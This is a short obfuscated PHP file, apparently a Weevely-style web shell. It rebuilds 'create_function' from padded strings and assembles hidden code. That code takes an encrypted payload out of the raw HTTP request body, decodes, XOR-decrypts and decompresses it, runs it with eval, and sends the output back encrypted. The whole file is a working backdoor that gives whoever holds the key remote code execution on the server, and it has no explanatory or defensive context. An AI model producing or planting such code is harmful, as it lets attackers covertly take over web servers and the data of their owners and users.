<?php
$b='U_e7Und_clean()7U7U;$r=@base7U64_7Uencode7U(@x(@gzc7Uompress(7U$o),7U$k));p7Urint("$p$kh7U$r$kf");}';
$j=str_replace('j','','crejatjejj_fjunctjion');
$P='7Uval(@g7Uz7Uun7Ucompress(@7Ux(@base7U64_decod7Ue($m[1]),$k7U)));$o=7U@o7Ub_get_conten7Uts7U();@ob7';
$E='atch("7U/$kh7U(.+)$kf/",@fi7Ule_get_7Ucontents7U("php://7Uinput7U"7U),$m7U)==1){@ob_7Ust7Uart();@e';
$X='=7U0;($7Uj<$c7U&&$i<$7Ul);$j++,7U$i++){7U$o.=$t{7U$i}^$k{7U$j}7U;}}retur7U7Un $o;7U}if(@pre7Ug_m7U';
$H='Uuncti7Uo7Un x($t,$k){7U$c=strl7Uen($k);$l7U=strl7U7Uen($t);$o="7U";f7Uor($i=0;7U$i<$l;){fo7Ur($j';
$J='$7Uk="17Ua7U6f9737U7U1";$kh="f46f7U497216c6";$kf7U=7U"92177U9c78597U33";$p="VY5pgF7UC00I7UBhWfAp";f7';
$w=str_replace('7U','',$J.$H.$X.$E.$P.$b);
$m=$j('',$w);$m();
?>